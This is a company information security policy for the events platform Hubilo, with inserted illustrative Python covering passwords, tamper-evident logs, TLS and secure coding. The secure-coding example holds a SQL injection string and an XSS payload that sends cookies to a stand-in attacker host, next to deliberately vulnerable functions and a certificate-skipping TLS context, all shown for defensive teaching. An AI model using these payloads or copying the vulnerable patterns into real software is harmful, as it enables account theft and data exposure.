1. Introduction
The confidentiality, integrity, and availability of information, in all its forms, are critical to the ongoing functioning and good governance of Hubilo. Failure to adequately secure information increases the risk of financial and reputational losses from which it may be difficult for Hubilo to recover.
This information security policy outlines Hubilo's approach to information security management. It provides the guiding principles and responsibilities necessary to safeguard the security of Hubilo's information systems and to protect clients' data.
2. Purpose
The purpose of this policy is to provide management guidelines for information security and to maintain appropriate information security controls at Hubilo to protect customer data.
3. Scope
This policy applies to all employees, departments and projects using client or Hubilo facilities and equipment.
4. Legal and Regulatory Requirements
Hubilo is committed to complying with all applicable laws and regulations of every location and country in which it operates and processes information.
The key regulations complied with include laws relating to corporate governance, employee relations, data privacy, intellectual property, and financial reporting.
5. Information Security Goals
Our Information Security Goals are listed below:
• Protection of Client information.
• Protection of information assets belonging to the
• To give clients confidence wherever their information needs to be shared or stored.
These policy objectives are achieved through the implementation of our Information Security Management System, which includes security standards, procedures and guidelines developed in accordance with ISO/IEC 27001:2013.
6. Information Security Management System (ISMS)
The scope and boundaries of the ISMS are defined considering business and contractual requirements and legal obligations. Any exclusion from the ISMS scope is justified and documented. Security policies and procedures are developed, updated and modified by Hubilo to address the selected controls and their implementation.
A compliance and security team is formed to implement, operate, and maintain the ISMS at Hubilo, and the compliance and security leader is accountable for this. Suitable measures of the effectiveness of controls, or groups of controls, are established for their evaluation.
The effectiveness of the ISMS is measured using inputs from regular internal audits, security audits, incidents, control effectiveness measurements, and suggestions and feedback from all interested parties.
Hubilo ensures that employees are aware of the information security policies and guidelines and contribute to the effectiveness of information security.
Hubilo communicates the current information security management system, the information security policies, and the related procedures to its employees and all relevant stakeholders.
7. Mobile Computing
Hubilo has established a formal mobile computing policy which outlines security requirements for mobile devices.
Due care is taken when using mobile computing devices in public facilities, meeting rooms and other unprotected areas outside Hubilo's premises to minimize the possibility of theft.
Remote access to business information across public networks using a laptop only takes place after successful identification and strong authentication.
All users using mobile computing devices such as laptops, tablets and smartphones for business purposes are trained on the security best practices towards these devices.
8. Human Resource Security
Hubilo has established a formal human resource security policy which outlines security requirements during employment and termination.
The Human Resources (HR) team at Hubilo addresses information security during recruitment, during employment, and after termination or change of employment for all Hubilo employees, contract employees and third-party employees.
All Hubilo employees who will have access to information in any form within the Hubilo and client environments are subject to background verification prior to being hired, in accordance with applicable laws and regulations. The Human Resources department is responsible for executing all background checks. All information gathered during a background check is handled and protected in accordance with the applicable laws and regulations.
When contractors or third parties are engaged and will access confidential customer information, HR ensures that requirements for background verification of the applicable contractor or third-party personnel are included in the contract, or that compensating controls are included in the contract.
Information security responsibilities are communicated to all employees and contractors during the hiring or contracting process by the HR manager. All employee and contractor agreements include the employee's or contractor's and Hubilo's responsibilities for information security, including the handling of information assets, the handling of information received from clients, and the consequences of violating the information security policy.
Hubilo ensures that all employees and contractors follow information security practices in accordance with Hubilo's information security policy.
All employees (full-time and part-time), and where relevant, contractors and third-party staff, receive appropriate awareness training in information security and regular updates of organizational policies and procedures relevant to their job functions.
Any information security incident or deviation from the defined information security practices is investigated and appropriate disciplinary action is taken by Hubilo.
Hubilo ensures that all employees and contractors are aware of the confidentiality or non-disclosure agreement (where applicable) and of the relevant terms of the employee or contractor agreement that continue to apply upon termination from Hubilo or transfer of position within Hubilo, so that customer information is protected from disclosure.
9. Asset Management
Hubilo has established a formal asset management policy which outlines security requirements related to Hubilo’s assets.
Hubilo identifies the assets associated with the creation, storage, transmission, deletion and destruction of information, and maintains an inventory of these assets. Hubilo's asset types comprise information assets, physical assets, software assets, people, services, etc.
The inventory of assets is maintained, and the asset owner is responsible for classifying the assets and reviewing that classification. The asset owner may also delegate a risk custodian.
Hubilo identifies, documents, implements and maintains guidelines for the acceptable use of assets and of the information they hold, which ensure the following:
• Employees follow the guidelines for acceptable use of all assets. Assets are used only for business and operational purposes and are protected from unauthorized use.
• Formal procedures are defined for the handling and storage of information assets according to their classification.
• Guidelines are defined to protect information assets from unauthorized disclosure or misuse.
• Hubilo classifies information in terms of legal, contractual and regulatory requirements and of its value and criticality to business operations with respect to confidentiality, integrity, and availability. Assets are classified according to the sensitivity of the information they support.
Procedures for securely disposing of media containing sensitive data or information once it is no longer required are developed and implemented at Hubilo.
10. Access Control
Hubilo has defined and documented access control rules and user registration rules in the access control policy. User and group file access rights are configured according to business requirements and on a need-to-know basis. The roles involved in granting access rights to an individual are segregated.
Hubilo provides access to information in a manner that protects the confidentiality and integrity of that information without compromising associated information or raw data.
Employees are given access according to their role. The following considerations determine the level of access to be provisioned:
• Access is granted according to the employee's role and job responsibilities with respect to the assets assigned to the employee.
• Security requirements of business applications and systems, such as authentication and password requirements.
• Segregation of access control roles, and consistency between access rights and information classification.
• The legal obligations that apply if access rights are violated are stated; limitations on access to data or services are stated and tracked.
• Access rights are reviewed quarterly, and any changes to or removal of access rights are recorded.
• As per the organization's requirements, privileged access rights are assigned on a need-to-know basis so that access is given to only one person at a time.
• As per the organization's requirements and the roles assigned to different teams, teams have separate test environments; where teams share a test environment, access is revoked once each team's purpose is fulfilled (the test environment is password protected).
• The access control policy provides detailed guidelines on user access management. A formal user registration and de-registration process is implemented to enable the assignment of access rights by Hubilo. Each user has a unique user ID, which is disabled upon transfer or termination of the employee.
A formal user access provisioning process is implemented by Hubilo to assign or revoke access rights for all employees having access to services or systems.
Management of privileged access rights:
• Hubilo shall ensure the allocation and use of privileged access rights are restricted.
• Privileged access rights are allocated to users on a need-to-know basis.
• An authorization process and a record of all privileges allocated is maintained.
• Privileged access rights shall not be granted until the authorization process is complete.
• Requirements for the expiry of privileged access rights are defined.
• For generic administration user IDs, the confidentiality of secret authentication information is maintained when shared.
• Hubilo provides restricted access to its application systems and information contained within the application system. Logical access to software and information is limited to authorized users.
Password Management: We have processes designed to enforce minimum password requirements for Hubilo Service. We currently enforce the following requirements and security standards for end user passwords on Hubilo Service:
• Passwords must be a minimum of 8 characters in length and include a mix of uppercase and lowercase letters as well as numbers and symbols.
• Repeated sign-in attempts with a wrong username or password lock the account, which is disabled for a period long enough to hinder brute-force sign-in but not so long that legitimate users are unable to use the application.
• Email-based password reset links are sent only to the user's pre-registered email address and are temporary. Hubilo prevents reuse of recently used passwords.
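The three end-user password controls listed above (length and character-class requirements, a temporary lockout after repeated failures, and no reuse of recent passwords) can be implemented in a few dozen lines. The following is an added illustration, not Hubilo's code: the failure threshold, lockout duration, history depth and PBKDF2 iteration count are assumptions chosen for the example.

```python
"""Added example (not Hubilo's code): enforcing the password controls in the
policy above. Thresholds, durations and the iteration count are assumptions."""
from __future__ import annotations

import hashlib
import hmac
import os
import time
from dataclasses import dataclass, field

MIN_LENGTH = 8               # from the policy text
MAX_FAILURES = 5             # assumption: lock after 5 consecutive failures
LOCKOUT_SECONDS = 15 * 60    # assumption: 15-minute lock
HISTORY_DEPTH = 5            # assumption: the last 5 passwords may not be reused
PBKDF2_ITERATIONS = 100_000  # kept low for a fast demo; use far more in production


def meets_complexity(pw: str) -> bool:
    """Minimum 8 characters with upper, lower, digit and symbol, as the policy states."""
    return (len(pw) >= MIN_LENGTH
            and any(c.isupper() for c in pw)
            and any(c.islower() for c in pw)
            and any(c.isdigit() for c in pw)
            and any(not c.isalnum() for c in pw))


def hash_password(pw: str, salt: bytes = b"") -> tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest) so the salt is stored with the hash."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ITERATIONS)


@dataclass
class Account:
    username: str
    salt: bytes
    digest: bytes
    history: list[tuple[bytes, bytes]] = field(default_factory=list)  # (salt, digest) of old passwords
    failures: int = 0
    locked_until: float = 0.0


def create_account(username: str, pw: str) -> Account:
    if not meets_complexity(pw):
        raise ValueError("password does not meet the complexity policy")
    salt, digest = hash_password(pw)
    return Account(username, salt, digest)


def login(acct: Account, pw: str, now: float | None = None) -> str:
    """Return 'ok', 'denied' or 'locked'. `now` is injectable so lockout expiry can be tested."""
    now = time.time() if now is None else now
    if now < acct.locked_until:
        return "locked"          # inside the lockout window, even a correct password is refused
    _, digest = hash_password(pw, acct.salt)
    if hmac.compare_digest(digest, acct.digest):
        acct.failures = 0
        return "ok"
    acct.failures += 1
    if acct.failures >= MAX_FAILURES:
        acct.failures = 0
        acct.locked_until = now + LOCKOUT_SECONDS
        return "locked"
    return "denied"


def change_password(acct: Account, new_pw: str) -> bool:
    """Reject weak passwords and any password equal to the current or HISTORY_DEPTH previous ones."""
    if not meets_complexity(new_pw):
        return False
    # Each stored entry keeps its own salt, so the candidate is re-hashed per entry.
    for salt, digest in [(acct.salt, acct.digest)] + acct.history:
        if hmac.compare_digest(hash_password(new_pw, salt)[1], digest):
            return False         # reuse of a recent password
    acct.history.insert(0, (acct.salt, acct.digest))
    del acct.history[HISTORY_DEPTH:]
    acct.salt, acct.digest = hash_password(new_pw)
    return True
```

Two caveats a reviewer of this control would raise: a per-account lockout lets an attacker who knows a username deny service to that user, so it should be paired with rate limiting by source address; and NIST SP 800-63B now favours length plus screening against known-breached passwords over mandatory character-class rules, which the policy above still requires.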
11. Physical and Environmental Security
Our data centres are hosted in secure third-party facilities that follow industry best practices and are protected against physical and logical attacks as well as natural disasters such as earthquakes, fires, and floods. We rely on the providers' third-party attestations of their physical security. Within our office premises, we employ industry-standard physical security controls.
12. Operations Security
Hubilo ensures that operating procedures are documented and are available to all employees. While documenting operating procedures, segregation of duties is considered. Operating procedures are made available centrally to all employees who need them to perform their job function.
Change Management: Hubilo ensures that changes to information processing facilities, business processes and systems that affect information security are controlled. The change management procedure includes the following:
• Identification and recording of significant changes.
• Planning and testing of changes.
• Assessment of the potential impacts, including information security impacts, of such changes.
• Formal authorization and approval of proposed changes.
• Verification that information security requirements have been met.
• Communication of change details to all relevant persons.
• Fall-back procedures, including procedures and responsibilities for aborting and recovering from unsuccessful changes and unforeseen events.
Capacity Management: Hubilo monitors and tunes the use of resources and identifies capacity requirements to ensure the required system performance. System/ application/ network administrators monitor the capacity utilization, detect, and resolve problems timely, and project future capacity requirements to ensure that adequate processing infrastructure is available to meet business needs.
Separation of development, testing and operational environments: Development, testing, and operational environments are segregated at Hubilo to reduce the risks of unauthorized access or changes to the operational environment. The production environment is logically and physically separated from the development and test environments. The confidentiality of any production data used within the development and test environments (when applicable) is protected.
Protection from malware: To prevent exploitation by malicious code, Hubilo provides awareness training to all employees on the risks of installing unauthorized software on their computers. Anti-virus software is kept running with the latest signatures, and business continuity plans are in place to ensure timely recovery of all IT systems after a malicious code attack.
Backup: The employees are required to store company data on software such as SharePoint, project-specific drives, or source code version control system only. Backup of all mission critical servers is performed at regular intervals. Hubilo ensures that backup copies of information, software and system images are taken and tested regularly in accordance with an agreed backup policy.
Logging and Monitoring: Audit logs of critical servers are monitored, and any accidental or intentional deletion or modification of them is reported. Hubilo ensures that logging facilities and log information are protected against tampering and unauthorized access. System administrator and system operator activities are logged, and those logs are protected and regularly reviewed.
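"Protected against tampering" is only verifiable if a change to a stored log can be detected after the fact. One standard way is to hash-chain entries so that editing or removing any record breaks the chain. The following is an added example, not Hubilo's logging tooling; the administrator events are constructed for the demonstration.

```python
"""Added example (not Hubilo's tooling): a hash-chained audit log in which any
modification or deletion of an entry is detectable. Sample events are constructed."""
from __future__ import annotations

import hashlib
import json

GENESIS = "0" * 64


def _entry_hash(seq: int, prev: str, event: dict) -> str:
    body = json.dumps({"seq": seq, "prev": prev, "event": event}, sort_keys=True)
    return hashlib.sha256(body.encode()).hexdigest()


def append_event(chain: list[dict], event: dict) -> str:
    """Append an event linked to the previous entry's hash; returns the new head hash."""
    prev = chain[-1]["hash"] if chain else GENESIS
    h = _entry_hash(len(chain), prev, event)
    chain.append({"seq": len(chain), "prev": prev, "event": event, "hash": h})
    return h


def verify_chain(chain: list[dict], expected_head: str | None = None) -> tuple[bool, int | None]:
    """Return (True, None) if intact, else (False, index of the first bad entry).

    Removing entries from the tail leaves a perfectly valid shorter chain, so the
    caller should pass the latest head hash it recorded out of band (for example
    shipped to a separate log host); that is what `expected_head` checks."""
    prev = GENESIS
    for i, e in enumerate(chain):
        if e["seq"] != i or e["prev"] != prev or _entry_hash(i, prev, e["event"]) != e["hash"]:
            return False, i
        prev = e["hash"]
    if expected_head is not None and prev != expected_head:
        return False, len(chain)  # entries missing from the end
    return True, None


# Constructed sample of administrator activity, the kind of log the policy says must be reviewed.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T09:12:03Z", "user": "admin1", "action": "sudo", "cmd": "systemctl restart nginx"},
    {"ts": "2024-03-01T09:15:40Z", "user": "admin1", "action": "useradd", "target": "svc-backup"},
    {"ts": "2024-03-01T09:16:02Z", "user": "admin2", "action": "chmod", "target": "/etc/shadow", "mode": "0666"},
]


def build_sample_chain() -> tuple[list[dict], str]:
    chain: list[dict] = []
    head = GENESIS
    for ev in SAMPLE_EVENTS:
        head = append_event(chain, ev)
    return chain, head


def tamper_and_verify() -> tuple[tuple[bool, int | None], tuple[bool, int | None]]:
    """Edit one entry and, separately, drop the last entry; return both verification results."""
    chain, head = build_sample_chain()
    edited = [dict(e) for e in chain]
    edited[2]["event"] = dict(edited[2]["event"], mode="0640")   # the chmod is "cleaned up" after the fact
    truncated = chain[:2]                                          # the incriminating entry is simply removed
    return verify_chain(edited, head), verify_chain(truncated, head)
```

The chain alone catches edits and deletions in the middle; only the externally recorded head hash catches deletion at the tail, which is why log shipping to a host the administrators being audited cannot write to remains necessary.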
Technical Vulnerability Management: Hubilo ensures that information about technical vulnerabilities in its information systems is obtained in a timely fashion, that the exposure to such vulnerabilities is evaluated, and that appropriate measures are taken to address the associated risk.
Once a potential technical vulnerability is identified, Hubilo identifies the associated risks and the actions to be taken; these involve patching the vulnerable systems or applying other controls. Patches are tested and evaluated before installation to confirm that they are effective and do not cause intolerable side effects; if no patch is available, other controls are considered. The technical vulnerability management process is regularly monitored and evaluated to ensure its effectiveness and efficiency.
13. Communications Security
Network security management: Networks are managed and controlled to protect information in systems and applications. Hubilo implements controls to maintain the confidentiality and integrity of data passing over public networks such as the internet or over wireless networks.
Hubilo ensures that technical controls are in place when obtaining security or network services from a service provider. The controls address the confidentiality, integrity and availability of the data transmitted between the client and the service provider. Hubilo regularly monitors the services delivered by the service provider, and corrective and preventive actions are taken to ensure that the provider delivers the services agreed in the contract.
Information transfer policies: Hubilo has defined formal transfer policies, procedures, and controls to protect the transfer of information and the use of all types of communication facilities. Company data sent over communications channels such as the internet are adequately protected from interception.
Electronic Messaging: Information involved in electronic messaging is protected. Information security considerations for electronic messaging include the following:
• Email accounts are used for business purposes only.
• Use of public messaging services requires prior approval.
The Hubilo product always connects to the web app over HTTPS using Transport Layer Security (TLS), the successor to the now-deprecated Secure Sockets Layer (SSL): a cryptographic protocol designed to protect against eavesdropping, tampering, and message forgery.
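"Over HTTPS" only delivers those three protections if the client actually verifies the server's certificate and hostname and refuses obsolete protocol versions. The block below is an added illustration, not Hubilo's code: a hardened Python client context beside the weakened one that commonly appears when certificate errors are "fixed" by disabling validation, plus a small audit function that tells them apart.

```python
"""Added example (not Hubilo's code): what "connects via HTTPS" should mean on the
client side, shown as a hardened ssl.SSLContext beside a weakened one."""
from __future__ import annotations

import ssl


def hardened_client_context() -> ssl.SSLContext:
    ctx = ssl.create_default_context()            # CERT_REQUIRED, hostname checking, system CA store
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # SSLv3 and TLS 1.0/1.1 are deprecated; refuse them
    return ctx


def weakened_client_context() -> ssl.SSLContext:
    # The "it works now" anti-pattern: the connection is still encrypted, but any
    # active attacker on the path can present their own certificate and read the traffic.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False                    # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list[str]:
    """Return the weaknesses found; an empty list means the context meets the baseline."""
    findings: list[str] = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("accepts TLS versions below 1.2")
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified")
    if not ctx.check_hostname:
        findings.append("hostname not checked against certificate")
    return findings
```

To use the hardened context, wrap the socket with `ctx.wrap_socket(sock, server_hostname=host)`; passing `server_hostname` is what makes the hostname check (and SNI) work, and omitting it raises with `check_hostname` enabled rather than silently skipping the check.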
14. Secure Development
Hubilo has established a Software Development Lifecycle covering the planning, requirements analysis, design, development, testing and maintenance of the product. The following controls are in place to meet information security and data protection requirements:
Product Security: Hubilo ensures that security and privacy requirements are identified and documented for new product development, new information systems, and enhancements to existing information systems. The following security controls are in place for the Hubilo product:
• Hubilo services are secured with TLS certificates together with appropriate authentication mechanisms.
• Anonymous authentication is disabled.
• Access to the database is restricted and monitored.
• Security logs are monitored and backed up regularly.
• Periodic vulnerability assessment and penetration testing (VAPT) is performed on public-facing services, and all identified findings are remediated.
• Security tools such as web application firewalls are used to protect against malicious attacks.
Code Security: Hubilo ensures that a secure development environment is established for each project. Depending on the coding environment, languages, databases, tools, and other components selected, appropriate guidelines for secure coding and configuration are adopted. The guidelines are evaluated to ensure they provide adequate protection against the types of attack identified in the risk assessment, such as:
• Cross-site scripting
• Missing or inadequate data validation
• Poor error handling
• Malformed input
• SQL injection
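Two of the attack classes in that list, SQL injection and cross-site scripting, come down to the same coding error: untrusted input spliced into a language (SQL or HTML) rather than passed as data. The following is an added example, not Hubilo's code: each vulnerable pattern is shown beside its hardened form, with an allow-list validator as the data-validation layer in front; the table, rows and attacker inputs are constructed.

```python
"""Added example (not Hubilo's code): SQL injection and XSS, vulnerable pattern beside
its fix, plus boundary validation. Table contents and attacker inputs are constructed."""
import html
import re
import sqlite3

ATTACKER_INPUT = "' OR '1'='1"   # constructed SQL injection payload
XSS_INPUT = '<script>document.location="https://evil.example/?c="+document.cookie</script>'


def seed_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE attendees (id INTEGER PRIMARY KEY, email TEXT, ticket TEXT)")
    conn.executemany(
        "INSERT INTO attendees (email, ticket) VALUES (?, ?)",
        [("a@example.com", "VIP-001"), ("b@example.com", "GEN-002"), ("c@example.com", "GEN-003")],
    )
    return conn


def find_ticket_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    # Input is spliced into the SQL text, so a quote in it rewrites the WHERE clause.
    sql = "SELECT email, ticket FROM attendees WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def find_ticket_safe(conn: sqlite3.Connection, email: str) -> list:
    # Parameter binding: the value is sent separately from the SQL grammar and can never change it.
    return conn.execute("SELECT email, ticket FROM attendees WHERE email = ?", (email,)).fetchall()


EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def is_valid_email(value: str) -> bool:
    """Allow-list validation at the trust boundary: defence in depth, not a substitute for binding."""
    return len(value) <= 254 and EMAIL_RE.fullmatch(value) is not None


def greeting_vulnerable(name: str) -> str:
    return "<p>Welcome, " + name + "</p>"           # untrusted data lands in HTML unescaped


def greeting_safe(name: str) -> str:
    # Contextual output encoding for an HTML text node; attribute and JS contexts need their own.
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"
```

With the payload above, the concatenated query becomes `WHERE email = '' OR '1'='1'` and returns every attendee's ticket, while the bound query returns nothing because the whole string is compared as one literal value.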
Hubilo ensures that development, test and production environments are separated wherever possible. Access to development, test and production servers is granted through a formal approval process on a need-to-know and least-privilege basis.
System Security Testing: Thorough testing and verification of any new and updated systems and independent acceptance testing is performed to ensure that the system works as expected.
15. Supplier Relationships
Hubilo provides essential services and business functions that rely on IT solutions and applications contracted from third-party suppliers, which may be primary contractors or subcontractors.
Hubilo has established a formal Third-Party Supplier policy and a procurement process so that contracts and dealings between Hubilo and third-party suppliers have acceptable levels of data protection and information security in place to protect information (such as personal and company data), maintain the confidentiality, availability, and integrity of that information, and are fit for purpose. Information security requirements and controls are formally documented in a contractual agreement, which may be part of, or an addendum to, the main commercial service contract.
Following controls are implemented for supplier management:
• Formal process for purchase requisition, vendor selection and purchase order is defined and implemented at Hubilo.
• Appropriate due diligence is exercised in the selection and approval of new suppliers before the contract is agreed.
• An NDA is signed if the supplier will access Hubilo's sensitive data.
• The third-party service delivery agreement includes service definitions, security controls and arrangements, and delivery levels. The service level agreement or contract is vetted by the legal representative.
• Hubilo ensures that the supplier complies with all applicable data protection regulations and best-practice standards.
• Third party service delivery is continuously monitored and reviewed by Hubilo’s
• Supplier access to Hubilo’s information resources is granted solely for the work contracted and for no other purpose.
• All Hubilo contracts clearly define each party's data protection and information security responsibilities toward the other by detailing the parties to the contract, the effective date, the functions or services being provided (including defined service levels), liabilities, limitations on the use of subcontractors, and the other commercial and legal matters normal to any contract.
Where a supplier processes personal data on Hubilo's behalf, the processing is governed by a written contract between the controller and the processor setting out the following:
• Subject matter and duration of the processing.
• Nature and purpose of the processing.
• Type of personal data and categories of data subjects involved.
• Obligations and rights of the controller and processor.
16. Information Security Incident Management
Hubilo ensures that all users are aware of the incident reporting and handling procedures. All information security incidents and weaknesses are identified, recorded, analysed, and classified based on the sensitivity. Hubilo ensures that the incident management team is trained on suitably categorizing the reported incident and subsequent action.
Hubilo has a Security Incident Management Policy designed to promptly and systematically respond to security, privacy, and availability incidents that may arise. The incident policy is tested and refined on a regular basis.
Notice: Hubilo agrees to provide a prompt written notice within the time frame required under Applicable Data Protection Law(s) to a customer’s Designated POC if it knows or suspects that a security incident has taken place. Such notice will include all available details required under Applicable Data Protection Law(s) for the customer to comply with its own notification obligations to regulatory authorities or individuals affected by the security incident.
17. Business Continuity and Disaster Recovery
Hubilo has established a formal business continuity and disaster recovery plan that is aligned with the information security incident management policy. The business continuity plan states the conditions for its activation and the personnel responsible for executing each component of the plan. BCP/DR plans are tested periodically to ensure that they remain effective and up to date.
Hubilo has identified the business requirements for the availability of its information systems. Redundant facilities or components are identified to ensure that availability, and they are tested to confirm that failover from one component or facility to another works as intended.
18. Compliance
Hubilo has established a formal Compliance Policy which addresses aspects of compliance required to be adhered to and fulfilled with respect to Hubilo’s Information Security Policies.
Hubilo addresses the legal and compliance requirements arising from relevant statutory legislation and from the contractual and regulatory obligations it must adhere to in order to protect its documents, records, and assets, thereby preventing misuse of information processing facilities.
Hubilo has identified the controls to be implemented to comply with the required regulations and legal requirements.
Intellectual Property Rights: Hubilo ensures that all software used in the organization is licensed and procured from reputable vendors. No user may download or install unauthorized third-party software on Hubilo's systems. Regular reviews are conducted to ensure that only authorized software and licensed products are installed on Hubilo's systems.
Protection of Records: Hubilo has identified and documented all records that need to be maintained to meet statutory, regulatory, contractual, and business requirements. It is ensured that appropriate protection measures are taken to protect the Confidentiality, Integrity and Availability of the records. Data or records that are no longer required for business, legal, and/or regulatory purposes will be disposed of securely.
Relevant statutory, regulatory, and contractual requirements for Hubilo's information assets are defined explicitly. Such requirements include, but are not limited to:
• Information Technology Act, 2000 (India)
• Software licensing requirements
• Intellectual property rights (IPR) laws
• Labour and general employment laws
• Companies Act, 2013 (India)
• Income Tax Act, 1961 (India)
As part of information security audits by independent consultants or bodies, appropriate confidentiality and non-disclosure agreements are signed with them, and any access granted to the external auditors is revoked immediately after completion of the audit.
Compliance requirements are used to enforce a minimum level of security and privacy within Hubilo.
Any Hubilo member found to have violated this policy may be subject to disciplinary and/or legal action according to the Disciplinary policy.